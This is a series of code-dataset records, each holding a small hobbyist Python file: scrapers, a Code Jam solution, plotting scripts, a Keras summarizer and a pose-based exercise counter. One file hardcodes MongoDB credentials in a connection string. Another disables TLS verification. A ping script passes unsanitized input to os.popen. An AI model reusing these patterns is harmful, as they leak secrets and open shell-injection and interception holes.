smallCollection\n\n\ndef cleanUDF(DF):\n \n DF.drop_duplicates(keep='first', inplace=True)\n DF = DF.reset_index(drop = True)\n \n return DF\n\ndef cleanCharDF(DF):\n \n tempCT = pandas.Series(DF['ClassType']).str.replace(\"Archer\", \"Bowman\")\n DF['ClassType'] = tempCT\n \n return DF\n\nif __name__ == '__main__':\n StartScraping()\n\n","repo_name":"Yongyiphan/WebScrapMSEA","sub_path":"CharacterData.py","file_name":"CharacterData.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587457641","text":"t = int(input()) # read a line with a single integer\nfor ii in range(1, t + 1):\n a_c, a_j = [int(s) for s in input().split(\" \")]\n\n time_c = []\n for c in range(a_c):\n start, end = [int(s) for s in input().split(\" \")]\n time_c.append((start, end, \"a\"))\n\n time_j = []\n for j in range(a_j):\n start, end = 
[int(s) for s in input().split(\" \")]\n time_j.append((start, end, \"b\"))\n\n time = time_c + time_j\n\n time.sort()\n\n # extend the list\n\n added_time = []\n\n for i in range(len(time) - 1):\n t = time[i]\n t_next = time[i + 1]\n\n t_s, t_e, t_t = t\n n_s, n_e, n_t = t_next\n\n if t_e == n_s:\n continue\n if t_t != n_t:\n new_type = \"ab\"\n elif t_t == \"a\":\n new_type = \"aa\"\n else:\n new_type = \"bb\"\n\n new_time = (t_e, n_s, new_type)\n added_time.append(new_time)\n\n first = time[0]\n last = time[-1]\n\n t_s, t_e, t_t = last\n n_s, n_e, n_t = first\n\n if t_e == n_s:\n continue\n if t_t != n_t:\n new_type = \"ab\"\n elif t_t == \"a\":\n new_type = \"aa\"\n else:\n new_type = \"bb\"\n\n if t_e == 1440:\n if n_s == 0:\n new_time = None\n else:\n new_time = (0, n_s, new_type)\n\n elif n_s == 0:\n new_time = (t_e, 1440, new_type)\n else:\n new_time = (t_e, 1440 + n_s, new_type)\n\n if new_time is not None:\n added_time.append(new_time)\n\n time += added_time\n\n time.sort()\n # print (time)\n\n while True:\n sum_a = 0\n sum_b = 0\n sum_ab = 0\n\n max_aa = None\n max_aa_l = 0\n\n max_bb = None\n max_bb_l = 0\n for i in range(len(time)):\n t = time[i]\n t_s, t_e, t_t = t\n if t_t == \"a\" or t_t == \"aa\":\n if t_t == \"aa\" and t_e - t_s > max_aa_l:\n max_aa = i\n max_aa_l = t_e - t_s\n\n sum_a += t_e - t_s\n\n elif t_t == \"b\" or t_t == \"bb\":\n if t_t == \"bb\" and t_e - t_s > max_bb_l:\n max_bb = i\n max_bb_l = t_e - t_s\n\n sum_b += t_e - t_s\n else:\n sum_ab += t_e - t_s\n\n # print (\"a, b, ab,\", sum_a, sum_b, sum_ab)\n if sum_b + sum_ab >= 720 and sum_a + sum_ab >= 720:\n break\n elif sum_b + sum_ab < 720:\n # print(sum_b, sum_ab)\n # aa -> b\n t_s, t_e, t_t = time[max_aa]\n time[max_aa] = (t_s, t_e, \"b\")\n if t_e - t_s + sum_b + sum_ab >= 720:\n break\n else:\n t_s, t_e, t_t = time[max_bb]\n time[max_bb] = (t_s, t_e, \"a\")\n if t_e - t_s + sum_a + sum_ab >= 720:\n break\n\n count = 0\n\n for i in range(len(time)):\n t_s, t_e, t_t = time[i]\n time[i] = (t_s, t_e, t_t[0])\n\n # print (time)\n for i in range(len(time) - 1): # find number of transitions\n t = time[i]\n t_next = time[i + 1]\n\n t_s, t_e, t_t = t\n n_s, n_e, n_t = t_next\n\n if (t_t != n_t):\n count += 1\n\n first = time[0]\n last = time[-1]\n\n t_s, t_e, t_t = last\n n_s, n_e, n_t = first\n if t_t != n_t:\n count += 1\n\n print(\"Case #{}: {}\".format(ii, count))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/207.py","file_name":"207.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33921079197","text":"#encoding=utf-8\nimport re\nimport json\nimport urllib3\nimport requests\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\n\ndef mitre_pull_cve():\n cveNameList = []\n #去除ssl证书告警\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n url = \"https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Microsoft+Exchange+Server\"\n #url = \"https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Microsoft+Windows+Media+Foundation+Remote+Code+Execution+Vulnerability\"\n headers = {\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'\n }\n r = requests.get(url, verify=False, headers=headers)\n #html = r.content.decode('utf-8')\n html = r.text\n bs = BeautifulSoup(html, \"html.parser\")\n #tags = 
list(bs.find(id=\"TableWithRules\").table.children)\n div = bs.find('div', {'id':'TableWithRules'})\n tds = div.findAll('td')\n for td in tds:\n try:\n #print(td.a.string)\n cveNameList.append(td.a.string)\n except:\n pass\n return cveNameList","repo_name":"shelly-cn/ExchangeCVESearch","sub_path":"cvePull/pullMitreCVE.py","file_name":"pullMitreCVE.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26044374460","text":"import warnings\nwarnings.filterwarnings( \"ignore\", module = \"matplotlib\\..*\" )\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport general_purpose as gp\n\nif __name__ == '__main__':\n labels = []\n\n df = pd.read_csv(\"./data/translation_error_gicp_vs_lc.csv\")\n print(df)\n df = df.dropna(axis=1, how='all')\n df = gp.transpose_by_iteration(df, columns=[\"GICP + Loop-Closure (x, y, z)\", \"GICP + Loop-Closure (x, y)\", \"GICP\", \"index\"]) \n\n lc_indices = df[\"index\"]\n absolute_error = df[\"GICP + Loop-Closure (x, y, z)\"]\n\n df = df.drop(\"index\", axis=1)\n x = []\n\n cnt = 0\n previous_lc_index = -1\n for i in lc_indices:\n if i == 1:\n # check previous\n if cnt == 0 or absolute_error[cnt] / absolute_error[cnt - 1] < 0.9:\n x.append(cnt)\n cnt += 1\n\n # plot individual plots\n gp.plot_error(df, True, 20)\n #plot_average_iterations(df)\n\n plt.xlabel(\"Pose-Index\")\n plt.ylabel(\"Durschnittliche Distanz [m]\")\n\n plt.vlines(x = x, ymin = -1, ymax = max(df[\"GICP\"]),\n colors = 'red',\n label = 'vline_multiple - full height')\n\n sns.despine()\n plt.show()","repo_name":"pahoffmann/tsdf_loop_closure","sub_path":"scripts/translation_error_gicp_vs_lc.py","file_name":"translation_error_gicp_vs_lc.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9920869475","text":"import setuptools\n\ndef configuration(parent_package='', top_path=None):\n\n from numpy.distutils.misc_util import Configuration\n from numpy.distutils.core import Extension\n\n config = Configuration('geospatialtools', parent_package, top_path)\n\n config.add_extension('terrain_tools_fortran',\n sources=['src/planchon_2001.f90','src/terrain_tools.f90'],\n extra_f90_compile_args = ['-fPIC','-lgomp','-Wall','-pedantic','-fopenmp','-O3']\n ),\n\n config.add_extension('upscaling_tools_fortran',\n sources=['src/upscaling_tools.f90'],\n extra_f90_compile_args = ['-fPIC','-lgomp','-Wall','-pedantic','-fopenmp','-O3']\n ),\n\n config.add_subpackage('',subpackage_path='libraries')\n \n\n return config\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n setup(**configuration(top_path='').todict())\n","repo_name":"chaneyn/geospatialtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"22012519075","text":"import sys\nprint(\"python ver in local machine:\",sys.version)\n\nimport socket\nhostname=socket.gethostname()\nprint(hostname)\n\nipadd = socket.gethostbyname(hostname)\nprint(ipadd)\nprint(\"\\n\")\n\nimport os\nwith open(\"ip_list\") as file:\n park = file.read()\n park = park.splitlines()\n print(\"{park} \\n\")\n\nfor ip in park:\n response = os.popen(f\"ping {ip}\").read()\n if(\"requested timed out.\" or \"unreachable\")in response:\n print(response)\n f = 
open(\"info_output.txt\",\"a\")\n f.write(str(ip)+ 'link is down'+'\\n')\n f.close()\n else:\n print(response)\n f = open(\"info_output.txt\",\"a\")\n f.write(str(ip)+ 'link is up'+'\\n')\n f.close()\nwith open(\"ip_output.txt\") as file:\n output = file.read()\n f.close()\n print(output)\nwith open(\"info_output.txt\",\"w\")as file:\n pass","repo_name":"Mohana-7373/pythonProject","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70996641793","text":"import tkinter as tk\nfrom tkinter import ttk\n\n\ndef greet():\n print(f\"Hello, {user_name.get() or 'World'}!\")\n\n\nroot = tk.Tk()\n\n# creates a placeholder for a string coming from an entry field\nuser_name = tk.StringVar()\n\n# entry field\nname_label = ttk.Label(root, text=\"Name: \")\nname_label.pack(side=\"left\", padx=(0, 10))\nname_entry = ttk.Entry(root, width=15, textvariable=user_name)\nname_entry.pack(side=\"left\")\nname_entry.focus()\n\ngreet_button = ttk.Button(root, text=\"Greet\", command=greet)\ngreet_button.pack(side=\"left\")\n\nquit_button = ttk.Button(root, text=\"Quit\", command=root.destroy)\nquit_button.pack(side=\"right\")\n\nroot.mainloop()\n\n# destroy quits the root window\n\n# working with entry fields and stringvars\n","repo_name":"cmulliss/gui_python","sub_path":"widgets/greet.py","file_name":"greet.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71174894273","text":"import pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Model, load_model as keras_load_model\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport tensorflow.keras.backend as K\n\nimport nodetails.prep\nimport nodetails.util\nfrom nodetails._types import *\nfrom nodetails import is_debug\nfrom nodetails.extern.attention import Attention\n\n\ndef create_models(lexicon: Lexicon, latent_dim=500) -> AbstractiveModel:\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n encoder_vocab = len(x_tkn.word_index) + 1\n decoder_vocab = len(y_tkn.word_index) + 1\n \n K.clear_session()\n encoder_input = layers.Input(shape=(x_len,))\n embedded1 = layers.Embedding(encoder_vocab, latent_dim, trainable=True, input_shape=(x_len,))(encoder_input)\n\n hidden_layer1 = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n hidden1, _, _ = hidden_layer1(embedded1)\n\n hidden_layer2 = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n hidden2, _, _ = hidden_layer2(hidden1)\n\n hidden_layer3 = layers.LSTM(latent_dim, return_state=True, return_sequences=True)\n encoder_output, state_h, state_c = hidden_layer3(hidden2)\n encoder_state = [state_h, state_c]\n\n decoder_input = layers.Input(shape=(None,))\n decoder_embedding = layers.Embedding(decoder_vocab, latent_dim, trainable=True)\n embedded2 = decoder_embedding(decoder_input)\n\n decoder_lstm = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n decoder_output, _, _ = decoder_lstm(embedded2, initial_state=encoder_state)\n\n attention = Attention()\n hidden4, _ = attention([encoder_output, decoder_output])\n\n hidden5 = layers.Concatenate(axis=-1)([decoder_output, hidden4])\n\n decoder_dense = layers.TimeDistributed(\n layers.Dense(decoder_vocab, activation=\"softmax\"))\n output = decoder_dense(hidden5)\n\n 
training_model = Model(name=\"training_model\",\n inputs=[encoder_input, decoder_input],\n outputs=output)\n\n infr_encoder_model = Model(name=\"encoder_infrerence_model\",\n inputs=encoder_input,\n outputs=[encoder_output, state_h, state_c])\n\n infr_prev_h = layers.Input(shape=(latent_dim,))\n infr_prev_c = layers.Input(shape=(latent_dim,))\n infr_prev_hidden = layers.Input(shape=(x_len, latent_dim))\n infr_embedded = decoder_embedding(decoder_input)\n\n infr_hidden1, infr_state_h, infr_state_c = decoder_lstm(\n infr_embedded, initial_state=[infr_prev_h, infr_prev_c])\n infr_hidden2, _ = attention([infr_prev_hidden, infr_hidden1])\n infr_hidden3 = layers.Concatenate(axis=-1)([infr_hidden1, infr_hidden2])\n\n infr_output = decoder_dense(infr_hidden3)\n infr_decoder_model = Model(name=\"decoder_infrerence_model\",\n inputs=[decoder_input] + [infr_prev_hidden, infr_prev_h, infr_prev_c],\n outputs=[infr_output] + [infr_state_h, infr_state_c])\n\n return AbstractiveModel(training_model,\n infr_encoder_model, infr_decoder_model, lexicon)\n\n\ndef train_model(abs_model: AbstractiveModel, training_set: TrainingSet,\n batch_size=64, show_graph=False):\n x_train, y_train, x_val, y_val, = training_set\n model = abs_model.training\n\n model.compile(optimizer=\"rmsprop\", loss=\"sparse_categorical_crossentropy\")\n early_stopping = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=is_debug())\n\n history = model.fit([x_train, y_train[:, :-1]],\n y_train.reshape(y_train.shape[0], y_train.shape[1], 1)[:, 1:],\n epochs=50, callbacks=[early_stopping], batch_size=batch_size,\n validation_data=([x_val, y_val[:, :-1]],\n y_val.reshape(y_val.shape[0], y_val.shape[1], 1)[:, 1:]))\n\n if show_graph:\n plt.figure()\n plt.plot(history.history[\"loss\"], label=\"train\")\n plt.plot(history.history[\"val_loss\"], label=\"test\")\n plt.legend()\n plt.show(block=True)\n\n return model\n\n\ndef save_model(abs_model: AbstractiveModel, save_location):\n _, encoder_model, decoder_model, lexicon = abs_model\n if is_debug():\n print(f\"Saving model at {save_location}\")\n\n encoder_model.save(f\"{save_location}/encoder.h5\")\n decoder_model.save(f\"{save_location}/decoder.h5\")\n if is_debug():\n print(f\"Encoder and decoder is saved.\")\n\n params = lexicon\n\n with open(f\"{save_location}/parameters.pkl\", \"wb\") as fp:\n pickle.dump(params, fp)\n if is_debug():\n print(f\"Model saved\")\n\n\ndef load_model(save_location) -> AbstractiveModel:\n if is_debug():\n print(f\"Loading model from {save_location}\")\n\n encoder_model = keras_load_model(f\"{save_location}/encoder.h5\",\n custom_objects={\"Attention\": Attention},\n compile=False)\n decoder_model = keras_load_model(f\"{save_location}/decoder.h5\",\n custom_objects={\"Attention\": Attention},\n compile=False)\n if is_debug():\n print(f\"Encoder and decoder is loaded.\")\n\n with open(f\"{save_location}/parameters.pkl\", \"rb\") as fp:\n lexicon = pickle.load(fp)\n if is_debug():\n print(f\"Model loaded\")\n\n return AbstractiveModel(None, encoder_model, decoder_model, lexicon)\n\n\ndef decode_sequence(input_seq, abs_model: AbstractiveModel):\n _, encoder_model, decoder_model, (_, y_tkn, _, y_len) = abs_model\n\n encoder_output, state_h, state_c = encoder_model.predict(input_seq)\n encoder_state = [state_h, state_c]\n\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = y_tkn.word_index[\"\"]\n\n _done = False\n result = []\n while not _done:\n output, state_h, state_c = decoder_model.predict(\n [target_seq, encoder_output] + encoder_state)\n\n 
sampled_index = np.argmax(output[0, -1, :])\n if sampled_index == 0:\n _done = True\n else:\n sampled_token = y_tkn.index_word[sampled_index]\n # print(\"sampled_token\", sampled_token)\n if sampled_token != \"\":\n result.append(sampled_token)\n\n if sampled_token == \"\" or len(result) >= y_len - 1:\n _done = True\n else:\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = sampled_index\n encoder_state = [state_h, state_c]\n\n return \" \".join(result)\n\n\ndef seq2text(input_seq, tkn: keras.preprocessing.text.Tokenizer):\n result = [tkn.index_word[it] for it in input_seq if it != 0]\n return \" \".join(result)\n\n\ndef test_validation_set(abs_model: AbstractiveModel, x_val, y_val, lexicon, item_range=(0, 1)):\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n def decode_validation_seq(it):\n result = decode_sequence(it.reshape(1, x_len), abs_model)\n assert result, f\"Empty result of type {type(result)} at item #{it}\"\n return result\n\n for i in range(*item_range):\n review = seq2text(x_val[i], x_tkn)\n sum_orig = (seq2text(y_val[i], y_tkn).replace(\"\", \"\")\n .replace(\"\", \"\")\n .strip())\n sum_pred = decode_validation_seq(x_val[i])\n print(\"\\nReview #%s: %s\" % (i, review))\n print(\"Original summary:\", sum_orig)\n print(\"Predicted summary:\", sum_pred)\n\n\ndef make_inference(abs_model: AbstractiveModel, query: str):\n (_, encoder_model, decoder_model,\n (x_tkn, y_tkn, x_len, y_len)) = abs_model\n\n def convert_to_sequences(words):\n result = []\n for it in words:\n it = it.strip()\n if it in x_tkn.word_index:\n result.append(x_tkn.word_index[it])\n elif is_debug():\n print(\"Token doesn't exist on lexicon: %s\"%it)\n\n return nodetails.prep.pad_sequences([result],\n maxlen=x_len,\n padding=\"post\")[0]\n\n query_cleaned = nodetails.prep.clean_text(query)\n\n query_seq = convert_to_sequences(query_cleaned.split())\n prediction = decode_sequence(query_seq.reshape(1, x_len), abs_model)\n if is_debug():\n print(\"\\n == INFERENCE ==\\n\")\n\n print(\" Query:\", query)\n print(\" query_cleaned:\", query_cleaned)\n print(\" Summary:\", prediction)\n\n return prediction\n\n# END OF ndabs.py\n","repo_name":"bozdogan/nodetails","sub_path":"code/nodetails/ndabs.py","file_name":"ndabs.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36370657627","text":"nums = dict(first=1, second=3, third=2)\r\n\r\nsq_num = {key: value ** 2 for key,value in nums.items()}\r\n\r\nprint(sq_num)\r\n\r\nstr1 =\"ABCD\"\r\nstr2 = \"12345\"\r\ncombo = {str1[i]: str2[i] for i in range(0,len(str1))}\r\nprint(combo)\r\n\r\n\r\ninstructor = {\r\n \"name\": \"Colt\",\r\n \"favorite_language\": \"Python\",\r\n}\r\n\r\nyelling_instructor = {k.upper():v.upper() for k,v in instructor.items()}\r\n\r\nprint(yelling_instructor)\r\n\r\nnuems = [1,2,3,4]\r\n\r\nprint({num:(\"even\" if num % 2 == 0 else \"odd\") for num in range(1,100)})\r\n\r\n\r\n","repo_name":"pwnmeow/Basic-Python-Exercise-Files","sub_path":"basics/DictionariesComprihension.py","file_name":"DictionariesComprihension.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4878773892","text":"# Jeremiah Soyebo - 1902930 #\r\n\r\nimport csv\r\nfileInput = input()\r\nwith open(fileInput, 'r') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n wordList = set(row)\r\n for word in wordList:\r\n count = row.count(word)\r\n print(word, 
count) # cant figure out what I'm doing wrong in zyLabs #\r\n","repo_name":"jeremiahsoyebo/CIS-2348","sub_path":"Homework_2/ZyLab9_10.py","file_name":"ZyLab9_10.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29090769874","text":" # push data\nfrom fileinput import filename\n\nimport cap as cap\nimport cv2\nimport mediapipe as mp\nimport numpy as np\nimport PoseModule as pm\nfrom pymongo import MongoClient # import mongo client to connect\nimport pprint\nfrom tkinter import ttk, CENTER, filedialog\nimport tkinter as tk\n\n\n# print(z[0][1])\n\nroot = tk.Tk()\nroot.geometry(\"700x500\")\nroot.title(\"List\")\nroot.configure()\nroot['background'] = '#AED6F1'\n\nlbl1 = tk.Label(root, text=\"Welcome to exercise recognition App\", background=\"#5DADE2\", fg=\"white\", font=\"none 24 bold\")\nlbl1.config(anchor=CENTER)\nlbl1.pack(padx=5, pady=25)\n\nframe = tk.LabelFrame(root, background=\"#5DADE2\", text='choice your method')\nframe.pack(padx=5, pady=(40, 10))\n\nselection = tk.IntVar()\nOPTIONS = [\n \"Push Up\",\n \"Seat Up\",\n \"Surya Namashkar\"\n] # etc\n\nvariable = tk.StringVar(root)\nvariable.set(OPTIONS[0])\n\ndef onRadioButtonChange():\n if selection.get() != 0:\n print(\"1\")\n b1[\"state\"] = \"active\"\n\n else:\n print(\"2\")\n b1[\"state\"] = \"disabled\"\n\n\n\ndef browsefunc():\n global filename\n filename = filedialog.askopenfilename()\n\n\n\n\ntk.Radiobutton(frame, command=onRadioButtonChange, text=\"Opern camara (Live)\", variable=selection, value=0).grid(\n column=0, row=0)\ntk.Radiobutton(frame, command=onRadioButtonChange, text=\"Using local storage\", variable=selection, value=1).grid(\n column=1, row=0)\n\n\nb1 = browsebutton = tk.Button(root, text=\"Browse\", state=\"disable\", command=browsefunc)\nb1.pack(pady=(5, 40))\n\nw = tk.OptionMenu(root, variable, *OPTIONS)\nw.pack()\n\n\ndef submit():\n # Creating instance of mongoclient\n client = MongoClient(\"mongodb+srv://test:test@cluster0.9sg1rjo.mongodb.net/?retryWrites=true&w=majority\")\n # Creating database\n db = client.Exercise\n employee = db.pushup\n employee = db.seatup\n detector = pm.poseDetector()\n count = 0\n direction = 0\n seatup = 0\n pushup = 0\n form = 0\n feedback = \"Fix Form\"\n angle = 0\n l = 0\n r = 0\n z = []\n\n col_1 = db.col_1\n col_2 = db.col_2\n col_3 = db.col_3\n col_4 = db.col_4\n col_5 = db.col_5\n col_6 = db.col_6\n col_7 = db.col_7\n col_8 = db.col_8\n col_9 = db.col_9\n col_10 = db.col_10\n col_11 = db.col_11\n col_12 = db.col_12\n step = 0\n\n dir_1 = 0\n dir_2 = 0\n dir_3 = 0\n dir_4 = 0\n dir_5 = 0\n dir_6 = 0\n dir_7 = 0\n dir_8 = 0\n dir_9 = 0\n dir_10 = 0\n dir_11 = 0\n dir_12 = 1\n\n\n for y in employee.find({}, {'_id': 0, 'pushup_data': 1}):\n z.append(y.get('pushup_data'))\n print(z)\n\n count=0\n print (\"value is:\" + variable.get())\n if(variable.get()==\"Push Up\"):\n form = 1\n elif(variable.get()==\"Seat Up\"):\n form = 4\n elif(variable.get()==\"Surya Namashkar\"):\n form = 3\n\n if(b1[\"state\"]==\"disabled\"):\n cap = cv2.VideoCapture(0)\n else:\n print(filename)\n cap = cv2.VideoCapture(filename)\n if(filename==\"\"):\n print(\"no file\")\n\n\n\n detector = pm.poseDetector()\n\n while cap.isOpened():\n ret, img = cap.read() # 640 x 480\n # Determine dimensions of video - Help with creation of box in Line 43\n width = cap.get(3) # float `width`\n height = cap.get(4) # float `height`\n # print(width, height)\n\n img = detector.findPose(img, False)\n lmList = 
detector.findPosition(img, False)\n # print(lmList)\n if len(lmList) != 0:\n elbow_left = detector.findAngle(img, 11, 13, 15)\n elbow_right = detector.findAngle(img, 12, 14, 16)\n leg_left = detector.findAngle(img, 23, 25, 27)\n leg_right = detector.findAngle(img, 24, 26, 28)\n\n temp = []\n temp.append(int(elbow_left))\n temp.append(int(elbow_right))\n temp.append(int(leg_left))\n temp.append(int(leg_right))\n \"\"\"shoulder = detector.findAngle(img, 13, 11, 23)\n hip = detector.findAngle(img, 11, 23,25)\"\"\"\n\n # Percentage of success of pushup\n per_left = np.interp(elbow_left, (90, 160), (0, 100))\n per_right = np.interp(elbow_right, (90, 160), (0, 100))\n\n # Bar to show Pushup progress\n bar_left = np.interp(elbow_left, (90, 160), (380, 50))\n bar_right = np.interp(elbow_right, (90, 160), (380, 50))\n\n # if( 1 ):\n # for i in range(4):\n # if(temp[0]+2>z[i][0] and temp[0]-2 z[i][1] and temp[1] - 2 < z[i][1] and\n # temp[2] + 2 > z[i][2] and temp[2] - 2 < z[i][2] and temp[3] + 2 > z[i][3] and temp[3] - 2 < z[i][3]):\n # seatup+=1\n\n # print(temp[0]+2)\n # print((z[i][0]))\n # print(temp[0] - 2)\n # print((z[i][0]))\n # if (temp[1] + 2 > z[i][1] and temp[1] - 2 < z[i][1]):\n # seatup += 1\n # # print(temp[1]+2)\n # # print((z[i][0]))\n # # print(temp[1] - 2)\n # # print((z[i][0]))\n # if (temp[2] + 2 > z[i][2] and temp[2] - 2 < z[i][2]):\n # seatup += 1\n # # print(temp[2] + 2)\n # # print((z[i][0]))\n # # print(temp[2] - 2)\n # # print((z[i][0]))\n # if (temp[3] + 2 > z[i][3] and temp[3] - 2 < z[i][3]):\n # seatup += 1\n # # print(temp[3] + 2)\n # # print((z[i][0]))\n # # print(temp[3] - 2)\n # # print((z[i][0]))\n\n # if(seatup==1):\n # print(\"SeatUpOK\")\n # seatup=0\n # angle=1\n # l=temp[2]\n # print(l)\n # # print(seatup)\n # else:\n # seatup=0\n # else:\n # print(leg_left)\n\n # Check to ensure right form before starting the program\n # if elbow_left < 90 and elbow_right < 90:\n # form = 1\n\n # elif elbow_left<50:\n # form = 2\n # elif elbow_right<50:\n # form = 3\n # elif leg_left<80:\n # form = 4\n # if(leg_left<80):\n # form=4\n\n # Check for full range of motion for the pushup\n if form == 1:\n # if per_left == 0 and per_right==0:\n if elbow_left <= 80 and elbow_right <= 80:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n Data = {\n \"pushup_data\": temp\n }\n print(temp)\n print(\"push up\")\n\n # Creating document\n # Creating document\n MyData = db.pushup\n # Inserting data\n MyData.insert_one(Data)\n # Inserting data\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_left > 160 and elbow_right > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the pushup\n if form == 2:\n # if per_left == 0 and per_right==0:\n if elbow_left <= 90:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_left > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the pushup\n if form == 3:\n # if per_left == 0 and per_right==0:\n if elbow_right <= 90:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_right > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 
0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the Seat Up\n if form == 4:\n # if per_left == 0 and per_right==0:\n if leg_left >= 140:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if leg_left < 80:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n Data = {\n \"pushup_data\": temp\n }\n print(temp)\n print(\"Seat Up\")\n\n # Creating document\n MyData = db.seatup\n # Inserting data\n MyData.insert_one(Data)\n\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # print(count)\n\n # Draw Bar\n\n if form == 3:\n cv2.rectangle(img, (580, 50), (600, 380), (0, 255, 0), 3)\n cv2.rectangle(img, (580, int(bar_right)), (600, 380), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, f'{int(per_right)}%', (565, 430), cv2.FONT_HERSHEY_PLAIN, 2,\n (255, 0, 0), 2)\n\n if form == 1 or form == 2:\n cv2.rectangle(img, (580, 50), (600, 380), (0, 255, 0), 3)\n cv2.rectangle(img, (580, int(bar_left)), (600, 380), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, f'{int(per_left)}%', (565, 430), cv2.FONT_HERSHEY_PLAIN, 2,\n (255, 0, 0), 2)\n\n # Pushup counter\n cv2.rectangle(img, (0, 380), (100, 480), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, str(int(count)), (25, 455), cv2.FONT_HERSHEY_PLAIN, 5,\n (255, 0, 0), 5)\n\n # Feedback\n cv2.rectangle(img, (500, 0), (640, 40), (255, 255, 255), cv2.FILLED)\n cv2.putText(img, feedback, (500, 40), cv2.FONT_HERSHEY_PLAIN, 2,\n (0, 255, 0), 2)\n\n \"\"\"if (lmList[25][2] and lmList[26][2] >= lmList[23][2] and lmList[24][2]):\n posiotion = \"sit\"\n if (lmList[25][2] and lmList[26][2] <= lmList[23][2] and lmList[24][2] and posiotion == \"sit\"):\n posiotion = \"up\"\n count += 1\n print(\"tirth\")\n print(count)\"\"\"\n\n cv2.imshow('Pushup counter', img)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nb2 = tk.Button(root, text=\"Submit\", command=submit)\nb2.pack(pady=(10, 50))\n\nroot.mainloop()","repo_name":"tirthghelani/Machine_learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17116842747","text":"import random\n\n\n# Генератор вычленения полей из массива словарей\ndef field(items, *args):\n\n for n in items:\n if len(args) == 1:\n if n.get(args[0]):\n yield n.get(args[0])\n else:\n new_items = {}\n for x in args:\n if n.get(x):\n new_items[x] = n[x]\n\n if len(new_items) > 0:\n yield new_items\n\n\n# Генератор списка случайных чисел\ndef gen_random(begin, end, num_count):\n a = 0\n while a < num_count:\n yield random.randint(begin,end)\n a += 1\n","repo_name":"Birukosh/lab4","sub_path":"gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505913744","text":"def is_prime(n):\n '''Returns True if the given positive number is prime and False otherwise'''\n if n == 1:\n return False\n for i in range(2,n):\n if n%i == 0:\n return False\n else:\n return 